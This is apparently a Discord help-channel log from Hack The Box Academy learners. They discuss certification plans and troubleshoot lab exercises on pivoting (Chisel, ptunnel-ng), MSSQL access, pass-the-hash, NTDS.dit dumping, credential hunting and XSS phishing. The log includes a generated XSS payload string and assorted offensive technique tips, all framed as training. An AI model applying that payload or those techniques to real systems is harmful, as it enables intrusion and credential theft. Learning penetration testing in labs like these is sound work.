because I just subscribed
maybe just focus on CBBH > CPTS > more advanced Academy stuff?
sly dome
if you are not using it ofc xD
quasi wave
ok thanks
sly dome
using it or not is your choice
maybe you can save some hours a day to practice retired machines or challenges idk
it is something personal
quasi wave
Ok, but since you recommend just focusing on Academy I think I will do that for the time being
rustic sage
the active boxes are always free so you don’t need a VIP subscription, unless you want to do retired content or early access to endgames
sly dome
yyy
rustic sage
i guess VIP always gives Pwnbox access so if you’re traveling or don’t have a dedicated hacking machine / vm that’s nice too
rustic sage
Ok, but since you recommend just focusing on Academy I think I will do that for ...
what is your goal?
sly dome
cbbh and cpts, just stick to academy o.O
also certs exam are NOT a CTF
boxes usually have another approach
quasi wave
what is your goal?
I guess my goal for next year and a half is to earn both CBBH and CPTS. Beyond that my long term goal for the next 2-3 years is to be able to do the hard or insane Academy stuff
like from the CREST paths tho I'm not interested in getting CREST certs
just want to practice paths to gain advanced skills
and do bug bounties
sly dome
check BSCP certification
rustic sage
I guess my goal for next year and a half is to earn both CBBH and CPTS. Beyond t...
that’s is completely doable, but yes focus on Academy and its modules. especially if you’re on a tight budget don’t be paying for HTB and Academy
quasi wave
that’s is completely doable, but yes focus on Academy and its modules. especiall...
ok thanks
sly dome
if web is your passion i’d go for CBBH and BSCP
quasi wave
ok thanks
rustic sage
focus on Academy, as i said above, all active boxes are free on HTB anyways so you can always test your skills on active content
quasi wave
Ok thanks
sly dome
the only reason i pay VIP+ is the exclusive instances 🤣
hate when people remove stuff or randomly reset the machines
quasi wave
eventually I do have other hacking skills I want to learn but I think Academy + bug bounties + maybe BSCP would be good for 2-3 years. Maybe even just in 2 years. Once I'm there then from there if I am good with Python which I am learning then from there I'm hoping that I could add in another area of hacking like Wireless or something but I don't want to focus on that if its too scattered.
I also think Academy covers what I generally need in terms of core skills.
So I'm getting good at Academy.
rustic sage
the only reason i pay VIP+ is the exclusive instances 🤣
this is a huge plus
quasi wave
Then once I'm really good at HTB Academy I'm thinking from there there are a few other types of hacking it would be good to know basics of so from there I could test skills with active boxes and if I'm ok at it then maybe I could add in different platform that covers other kinds of hacking, but probably not before.
The only other platform I probably need is Pentester Academy tho tbh because covers basics of other areas I am interested in.
But I feel like HTB Academy covers the core skills really well
then from there everything else I can learn ezpz anyways since that's most of the hard stuff
windows, linux, web
network to some extent
I also like the foundation academy provides because I feel like other stuff could flow from it
except for social engineering but I'll deal with learning that a different way just by socializing and practicing elicitation and ethical pretexting lmao
which is totally doable
rustic sage
i’m bias, but i’ve tried a few other websites and academies, but nothing really stuck or got me as motivated as HTB Academy🤷🏼♂️ prefect blend of learning and being challenged
quasi wave
i’m bias, but i’ve tried a few other websites and academies, but nothing really ...
I know. I agree. That's why I'm doing HTB Academy first in order to milk its value for web, linux, windows, networking. Then from there if I could learn basics of other stuff such as wireless hacking, network, IoT, and social engineering, that would be great.
but I don't want to spread myself thin so only basics and only after I get very good at HTB Academy
and maybe cloud hacking would be good to know
like AWS, Google Cloud, etc.
and be good at Python and C programming to help with hacking
but problem is I want to know everything (which is not realistic) so I think Academy is a more realistic focus
then in 2-3 years I'll see where I go from there
once I master academy stuff
is that a bad idea for a goal in five years?
I mean I am told I can do Academy goal in 2-3 years so then from there the next step would be to learn basics or other stuff
I know being advanced at everything is not realistic but to know some of basics of some other stuff
rigid forge
Hi, did you solve it? I am having the same problem, it asks me what goes after user.name in the KQL query for the field that contains the word "admin", I add admin* and I get an error
last lotus
Ez
Also asking others for help with these training exercises really defeats the purpose
last lotus
I knew you could do it. Asking others for help is sometimes a nessesary tool as well, as you will learn in a later (almost impossible) exercise. It was made for people to learn that sometimes asking for help is the way to go.
Someone breached the 7th firewall, gotta go!
orchid pine
can some one explain the disffrence btween using chisel in reverse mode and normalmod
rustic sage
"In the previous example, we used the compromised machine (Ubuntu) as our Chisel server, listing on port 1234. Still, there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option."
sly dome
for example imagine there is an internal web server thats only accessible from internal network (iptables), in order to see it from your machine you have to reverse port forward it
its like reverse and bind shells
reverse ones go from “victim” to attacker and this way they are outbound traffic which usually is less restricted than inbound
rigid forge
I knew you could do it. Asking others for help is sometimes a nessesary tool as ...
ty bro, I was thinking inside the box
orchid pine
for example imagine there is an internal web server thats only accessible from i...
we need to be the client on this situation no ?
sly dome
the easier way to understand it is comparing with reverse and bind shells or with the direction of the traffic
if your machine is the client the traffic goes from your machine to the victim
which is inbound traffic, usually restricted
orchid pine
then we use it to buy pass restriction
fathom pendant
Also asking others for help with these training exercises really defeats the pur...
That's the whole point of this channel my guy
sly dome
then we use it to buy pass restriction
we use it in reverse mode to reverse the direction of the traffic
which allows you to reverse port forwarding for example
mossy hatch
can someone help me for Attacking Active Directory & NTDS.dit in Password Attacks for the last question Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)i cant copy the ntds.dit file on my local machine everytime i get this error
dark sandal
I'm doing the XSS Module, Phishing Lesson and having problem with the URL encoding...
So.. which part should I encode, cus if I encode the whole url I keep having issues..
quick crane
you can see your payload
sly dome
holyy how fun was Javascript Deobfuscation module
orchid pine
the double pivot
section
was not explained in a good way
anyone has a resourcesn where i can understand this well
rustic sage
if you don’t understand a section/module it’s always i would advised to reread it once you finish the path or a few days later
i personally would recommend redoing pivoting and AD once you complete the path no matter how good you are
covert sierra
can anyone help with WINDOWS EVENT LOGS & FINDING EVIL mini module Get-WinEvent section?
orchid pine
if you don’t understand a section/module it’s always i would advised to reread i...
yeah but i dindt understand the concept properly
vague fossil
i am skiddyphus and my boulder is green cube modules
tight mesa
anyone who has done the ptunnel-ng section into Pivoting module..!!!
ptunnel-ng is not running into the jump host
I tried compile an older ptunnel-ng version and move to the jump host and not worked either
deep shore
Howdy folks! Running into an issue with the SocksOverRDP section of the Pivoting module, specifically related to Proxifier. When Proxifier is running on the initial host, it fails to route traffic from mstsc.exe correctly, and it does not appear to realize mstsc is running. Is there a common error somewhere in my setup perhaps?
dark sandal
you can see your payload
I ran xsstrike.py and found '><a%0doNpOINteREnter+=+a=prompt,a()>v3dm0s as the payload
It seems I just needed the '> to be added to the JavaScript piece of code with the login form. Problem is Im not fully understanding the output of xsstrike and how to use it..
If anyone else can help me with that I'd be thankful..
I'm talking about XSS easy module, Phishing Exercise
tight mesa
anyone who can give me a hint how to run ptunnel-ng into the jump host?
cuz, I did exactly what is explained in the module/section and I'm receiving a dependency error from jump host
ubuntu@WEB01:~/ptunnel-ng-1.1/src$ sudo ./ptunnel-ng -r10.129.59.40 -R22
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)```
cedar void
How do I know which plugin rules to select for this nessus assessment exercise?
rough notch
so im doing the Active directory part, and im pretty sure im getting the answer right but its saying wrong
What role ensures that objects in a domain are not assigned the same SID? (full name)
Relative ID (RID) Master - The RID Master assigns blocks of RIDs to other DCs within the domain that can be used for new objects. The RID Master helps ensure that multiple objects are not assigned the same SID. Domain object SIDs are the domain SID combined with the RID number assigned to the object to make the unique SID.
civic nova
Hey! Is anyone able to help me with the Attacking Common Services SQL module? I literally cannot login to the SQL server no matter what i do. I am using the correct command with mssqlclient.py but am getting this error no matter what "Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
I am seriously pulling my hair out on this one. Been about 2 hours on my own so far.
fathom pendant
How do I know which plugin rules to select for this nessus assessment exercise?
...
It shows you, but the jump host they provide already has pre-populated scans
civic nova
Hey! Is anyone able to help me with the Attacking Common Services SQL module? I ...
I also cant scan the server with NMAP. It is blocking my pings and with the -Pn command it is stating the host is down. But normal pings show status as up
orchid pine
I also cant scan the server with NMAP. It is blocking my pings and with the -Pn ...
use the mssqlclient.py -windows-auth
civic nova
use the mssqlclient.py -windows-auth
I am
mssqlclient.py -p 1433 htbdbuser@10.129.34.59 -windows-auth
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
slender shoal
have you read the error?
civic nova
Yes
slender shoal
hvae yo ugoogled the error?
civic nova
Yes - From what i gathered i need to be doing exactly what i am doing.
tight mesa
into RDP and SOCKS Tunneling with SocksOverRDP how to fix that restriction error?
civic nova
Hmmmm
That is interesting. I think i figured it out. Removing the -windows-auth actually helped.
fathom pendant
into RDP and SOCKS Tunneling with SocksOverRDP how to fix that restriction error...
There is another protection service running
tight mesa
ok., thank you
@fathom pendant do you know why is this error into ICMP Tunneling with SOCKS :
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)`
?
fathom pendant
I think you need to statically compile it. That's been stated like a dozen times in this channel
tight mesa
ok., could you please point me out to some documentation?
tight mesa
thanks
sly dome
XSS module also super fun !
do we have any CSRF module/section in the academy?
i could not find
sly dome
mssqlclient.py -p 1433 htbdbuser@10.129.34.59 -windows-auth
Impacket v0.10.1.dev...
from mssqlclient help panel
windows auth requires an user in the domain btw (such as service account)
now think a bit
tall saffron
It is possible to buy a whole path in once, like let say bbh path cost me approx 1300 cubes, isnt an option to buy them directly without paying 1000 cubes this months and 500 the next one?
autumn pilot
you can buy cubes without paying for a subscription
rustic sage
Hello everyone im DOCUMENTATION & REPORTING module in Notetaking & Organization
im stucking in question 2
Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)
I have the answer but im puting it and the format is wrong, somebody could help me?
vital adder
the rdp issue is finally hitting me 🥲 😂
fathom pendant
the rdp issue is finally hitting me 🥲 😂
It's why I got used to remmina
vital adder
i've tried remmina even rdp from my windows machine
fathom pendant
F
violet tundra
It's why I got used to remmina
Reminna is good only if you don't need to pass the hash
fathom pendant
You can pth in remmina there's a section to put a hash in
violet tundra
You can pth in remmina there's a section to put a hash in
Oh wait let me see
Oh my god
thanks bro
fathom pendant
Dude I had the same reaction to finding out
knotty crag
guys
i wanted a help with installing mysql , while installing its actually giving an error saying that mysql-server doesnt have a installation candidate
how to solve this problem
anyone could help?
fathom pendant
Google it
knotty crag
yeah i did i couldnt fine any solution
fathom pendant
This really isn't the place to ask for general support
#1024429874246590575 make a post there
halcyon idol
Hi I have been trying to solve this question for days now its for (SOC Path) any Hints seems something off. I literally tried everything possible
________________________By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe
cedar void
Hi for question 3, I answered as 34460 as the answer to the question " What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan? " and it was wrong even though I thought it showed the highest vulnerability
violet tundra
Hello everyone, i'm trying to do the question Crack this user's password hash and submit the cleartext password as your answer. from Assessement 2 of Active Directory lab:
- I found the string hash from CT... user
- But I don't know what i'm doing wrong trying to crack with correct -m option and rockyou exhausts
halcyon idol
Hi I have been trying to solve this question for days now its for (SOC Path) any...
What Even ID or Filter I have to pick
fiery berry
Hi for question 3, I answered as 34460 as the answer to the question " What is...
wrong answer, must be another one
cedar void
Well obviously . I want to know how you determine what the highest critical vulnerability might be if not by score
fiery berry
Hello everyone, i'm trying to do the question `Crack this user's password hash a...
strange, it worked for me. I'm going to dm you so you can show me the hash just to double check
fiery berry
Well obviously . I want to know how you determine what the highest critical vuln...
well, its exactly the first one you see when you filter by "Score" even though the second one listed has the same score
cedar void
well, its exactly the first one you see when you filter by "Score" even though t...
the second one is 9.8 . I tried looking at the Windows one and tried both the plugin IDs with a score of 8.1(the highest one for windows) and I still got the plug in ID wrong
fiery berry
the second one is 9.8 . I tried looking at the Windows one and tried both the p...
it can't be I just looked at scan, give me a another sec to spawn the machine
fiery berry
the second one is 9.8 . I tried looking at the Windows one and tried both the p...
did you look at the "Windows_basic_authed"?
cedar void
did you look at the "Windows_basic_authed"?
fiery berry
click "Back to My Scans", there is one scan named "Windows_basic_authed"
cedar void
Oh okay, I see it now
fiery berry
click on it, see the first vuln? It must be the one to answer the question
cedar void
click on it, see the first vuln? It must be the one to answer the question
Yes
Strange
fiery berry
Strange
This is the way "Nessus" sort out the vuln based on the score. It may be a question for the dev team
cedar void
It worked
modest pier
can anyone help? i cant login to HTB account even though i know my password is correct. when i tried clicking on 'forgot password' and put in my email. im not getting any password reset link. the email works because HTB sends me an email to the associated email address
but i do not receive it from my email
mossy hatch
can anyone help me please with Credential Hunting in Windows section in password attacks module, i don't know how to transfer the exe LaZagne to the windows host, i tried with scp,smb but it doesn't work
<@&861185840277487616>
novel matrix
<@&861185840277487616>
thanks
mossy hatch
can anyone help me please with Credential Hunting in Windows section in password...
i found how, just add /drive:linux,<path> in the xfreerdp command
sweet hemlock
what are these program tasks guys
acoustic owl
what are these program tasks guys
I think it's about completing modules.
sweet hemlock
I think it's about completing modules.
oh hmm
violet tundra
Oh my god just finished AD enumeration & attacks, the hardest module since i started CPTS: https://academy.hackthebox.com/achievement/737/143
It was a very very good module, thanks for all who created it
rustic sage
what are these program tasks guys
that is the referral page. you'll get rewards based on the actions of people you refer and they'll show up there
errant hawk
Is the information security foundations path a good start point on academy? My background Is minimal started an IT roll this January as an apprentice managed services engineer doing level 3 azure cloud. Got my ISC2 cc exam next month and just looking to get more technical skills specially around networking & os fundamentals with the idea of transitioning internally from help desk to cyber next year or so
rustic sage
i found how, just add /drive:linux,<path> in the xfreerdp command
make sure to add /dynamic-resolution, but yes /drive: is huuge as well
sweet hemlock
that is the referral page. you'll get rewards based on the actions of people you...
hmm
vague fossil
Is the information security foundations path a good start point on academy? My b...
oh I finished that one yesterday
I thought they were pretty helpful overall. as someone with no active directory experience it felt like a lot to get through but bash scripting was fun -- it probably depends on your experience level. It's a lot of walls of text so for stuff I didnt understand I went to youtube and watched videos and then went back to the module
also the cheatsheets are fantastic
pure osprey
Awesome skills assessment on the LFI module 🔥
errant hawk
oh I finished that one yesterday
I thought they were pretty helpful overall. as...
Thank you for the informative response based on your experience, I appreciate that
The only active directory experience I have is low level user and security group management etc on domain controllers for clients
vague fossil
you're golden then
the networkchuck free ccna playlist goes well with the intro to networking module, subnetting was really easy with both resources
errant hawk
Interesting. I am sure it will be beneficial then. I have covered the basics in my apprenticeship but networking is something I feel that I need to put some more effort into for sure.
thick juniper
Quick pointer for people trying to run smb_delivery from Metasploit and finding it not working with the pwnbox: trying start it with sudo msfconsole -q
This just had me in circles for the last hour
twilit gull
Thank you for all the suggestions, without this discord channel. I would have taken ages to complete it.
static mauve
Hi I’m new to HTB could anyone help with a question on the into to Nmap module?
rustic sage
Hi I’m new to HTB could anyone help with a question on the into to Nmap module?
don't ask to ask, just ask 😛
static mauve
Ok cool wanted to double check it’s allowed 😄 I’m on the first question: based on the last result, find out which operating system it belongs to. Submit the name of the OS.
So far I determined the target host after going through all the examples in this section and that’s what I’ve been running my scans against. I’m using the packet trace flag to look at the TTL to find out which OS but my results keep showing NSOCK info and I’m not sure where to go or if I’m running it against the right target
mossy hatch
Ok cool wanted to double check it’s allowed 😄 I’m on the first question: based ...
check the default ttl
rustic sage
Ok cool wanted to double check it’s allowed 😄 I’m on the first question: based ...
in the future it's very helpful if you list the section you're on as well! i believe you're in the host discovery section?
||you're on the right path with TTL|| feel free to reach out if you need more help
mossy hatch
rain briar
im on attacking sql section lol
lusty thicket
Ok cool wanted to double check it’s allowed 😄 I’m on the first question: based ...
use google
¯_(ツ)_/¯
rustic sage
you can dm me
sly dome
it works for me with impacket 0.11.0
maybe consider update if you see a tool which states it is from 2020
livid pier
Anybody having an issue getting the windows.acquisition to work in the DFIR module?
rustic sage
impacket-mssqclient not functioning properly
i get the same error, i search and the solution tells edit code in something lines, i try it but doesnt work for me, finally i uninstallit and install it using ansible-script of ippsec
rain briar
do you have a solution somewhre i can review to try
rustic sage
do you have a solution somewhre i can review to try
replaced ctx = SSL.Context(SSL.TLSv1_METHOD) with ctx = SSL.Context(SSL.TLSv1_2_METHOD) both at line 911 & 663 and now mssqlclient.py works
Tell me if this works for u please
rain briar
how do i even do that lol
rustic sage
```sudo nano /usr/local/lib/python3.9/dist-packages/impacket-0.9.23-py3.9.egg/impacket/tds.py````
Here hit (control + f ) and search SSL.Context and change it
if you dont know where is your tds.py search it
find / -name "tds.py" 2>/dev/null
lusty thicket
if you dont know where is your tds.py search it
```find / -name "tds.py" 2>/dev/...
locate tds.py
👍
rustic sage
```locate tds.py```
jajajajaja sure this will work
rustic sage
because your path is using the previous version
rain briar
rustic sage
you have to give them the absolute route of the .11 or uninstall the previous version and add the new in the path
you have to install dsinternal
open chatgpt and paste you error, he will tells how to solve it
rain briar
i just git clone https://github.com/MichaelGrafnetter/DSInternals.git
that didnt work
hmmm
rustic sage
i tell you the ipsec scripts its the best solution
rain briar
whats that
rustic sage
rain briar
ahhh
rustic sage
uninstall impacket and run this
rustic sage
execute it on you vm!
rain briar
so use ansible?
rustic sage
yeah
Can someone explain me why autoroute in metasploit doesn't work for windows hosts
rustic sage
all this just to do a course lol
when you do AD module or Windows privesc you gonna see the stars ajajjajajaja
rain briar
i installed dsinternals still same error
Collecting dsinternals
Downloading dsinternals-1.2.4.tar.gz (174 kB)
|████████████████████████████████| 174 kB 9.9 MB/s
ERROR: Package 'dsinternals' requires a different Python: 2.7.18 not in '>=3.4'
rustic sage
python --version
rustic sage
try to install it manually and use python3 instead of python
rain briar
i guess im confused because i have python3 installed
wouldnt that be the most updated
but still throwing that 2.7.18 error
rustic sage
maybe your path is first to python and then to python3
rain briar
coudl be how would i check that
rustic sage
echo $PATH
rain briar
└─# echo $PATH
/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/root/go/bin
rustic sage
python -c "import sys; print(sys.executable)"
rain briar
/usr/bin/python
sly dome
start using python virtual environments
cd /opt && mkdir impacket && cd impacket
python3 -m venv impacket && source impacket/bin/activate
and from there install it with pip3 install -r requirements.txt after cloning the repo
OR a better approach
install it with pipx which does all of that automatically and install the scripts system-wide
just read documentation
rain briar
theres a dependencuy broken in my system
i was able to fix it i had to change the alias of pythonto python3
then i could install dsinternals
alias python=python3.4
candid lily
can some one recommend me best modules apart from pentest pathway
rustic sage
can some one recommend me best modules apart from pentest pathway
probably the Tier III modules based on what you want to learn / where you're struggling
candid lily
i have only student sub :(
mossy nest
Hi guys, i'm doing hard lab in attacking common services modules. I tried to bruteforce in every service, found that smb service is open to guest but i'm unable to get any usefull info from the shares available... any nudges ?
rustic sage
i have only student sub :(
click on Modules and then click on Tier II there are a ton of useful modules that aren't in the path
Hacking WordPress
Cracking Password with Hashcat
Anything from CBBH path (web will help if your goal is CPTS)
Intermediate Network Traffic Analysis
oh okay thanks
rustic sage
Hi guys, i'm doing hard lab in attacking common services modules. I tried to bru...
||take another look at SMB|| if you need further help, feel free to DM
anyone else not able to go to the academy at the moment?
turbid hull
Yep
rustic sage
for the academy?
turbid hull
Yep
turbid hull
Nice ! Work well my friend
vital adder
is the academt down? again?
gusty coyote
yeah
ivory topaz
anyone else not able to go to the academy at the moment?
yup
hallow siren
academy down?
rustic sage
why is there no down detector for it lol
its working for me
503 bad gateway? happened like 2 minutes ago
refresh
loud sapphire
Down for me too.
Host error so reports cloudflair.
vital adder
why is there no down detector for it lol
there is non official for the academy but there is a lot of site that can check this https://downforeveryoneorjustme.com/academy.hackthebox.com?proto=https
burnt sluice
hello, the academy seems down right>=?
rustic sage
there is non official for the academy but there is a lot of site that can check ...
ah ty
gusty coyote
my pwnbox minimizes its size everytime i switch tabs in my browser is there a fix to it?
vital adder
refresh
vital adder
it's Fing annoying and unfortunately nope
gusty coyote
yep very annoying
rustic sage
bruh it died again
rain briar
can anyone assist with SQSH commands
tawdry solstice
my pwnbox minimizes its size everytime i switch tabs in my browser is there a fi...
No way to prevent it - but you can fix it without refreshing by either slightly resizing your window(on your full screen view), or moving the browser tab around rq
gusty coyote
No way to prevent it - but you can fix it without refreshing by either slightly ...
ohh ok, will try it
tawdry solstice
it seems like a javascript-y kinda thing -- where "on load" and "on window resize", the fullscreen view resizes itself to match
remote veldt
are the machines loading hard ori is it just me?
rustic sage
where should I notify about an error? I was just looking way back at linux fundamentals trying to help a freind with something, and noticed this error.
Error:
"In addition to providing basic information like the current user and working directory, we can customize to display other information in the prompt, such as the date and time, IP address, date, time, "
You can see here that it shows that you are able to grab date and time twice
You can find it here:https://academy.hackthebox.com/module/18/section/66
vital adder
rustic sage
thanks\
acoustic owl
or can anyone assist with cracking a hash
which module?
rustic sage
@acoustic owl when i do ping sweep and found 4 hosts if the gateway(192.168.0.1) found also is this 5 hosts within the internal network?
Or the gateway doesn't count
acoustic owl
Why shouldn't the gateway be one of them? It is a router and therefore a network device. If you can control it, various attacks are possible.
rustic sage
Why shouldn't the gateway be one of them? It is a router and therefore a network...
So it is 5 hosts not 4?
tight mesa
hello guys, I'm still having this issue with ptunnel-ng :
reading the documentation I followed the instruction of "./configure && make" (edited)
but the issue still persist, any idea, suggestion?
@digital pewter I saw you shared some info related to this issue before, could you please share it one more time?
acoustic owl
hello guys, I'm still having this issue with ptunnel-ng :
reading the documentat...
Download the compiled version
https://github.com/utoni/ptunnel-ng/releases/tag/v1.42
digital pewter
<@743323715911024664> I saw you shared some info related to this issue before, c...
Sure, you can modify autogen.sh to the following to have it statically compile:
#!/bin/bash
set -x
OLD_WD="$(pwd)"
NEW_WD="$(dirname ${0})"
cd "${NEW_WD}"
if ! autoreconf -fi; then
aclocal
autoheader
automake --force-missing --add-missing
autoconf
fi
cd "${OLD_WD}"
LDFLAGS=-static "${NEW_WD}/configure" --enable-static $@ && make clean && make -j${BUILDJOBS:-4} all
thank u both
wintry crater
Hi everyone! Just one question about AD: Let's say attacker host A compromises a remote Linux server B, which can reach the hosts from the internal AD network. Right now it's not possible to install Responder on Linux server B, but is there a way to run Responder on attacker host A to capture NTLM hashes from the internal network?
acoustic owl
to transfer file
What exactly does a VPN have to do with file transfer?
fiery berry
Hi everyone! Just one question about AD: Let's say attacker host A compromises a...
everything works at layer 2, so I haven't seen this case yet reported somewhere but maybe this article is what are you looking for:
https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/
I had a quick look so I actually don't know if the content is good or not
haughty pond
GOTCHA
rain briar
could def use help with the sql part of that section
wintry crater
everything works at layer 2, so I haven't seen this case yet reported somewhere ...
Thank you, I'll take a look 🙂
tight mesa
Sure, you can modify `autogen.sh` to the following to have it statically compile...
hey man, I really appreciate your help, I could finish the ICMP tunneling thanks to you....
wooden glen
hi. I'm new here.
wooden glen
🤙
misty current
Has anyone tried listing accessible SMB shares using Kerberos authentication from Linux?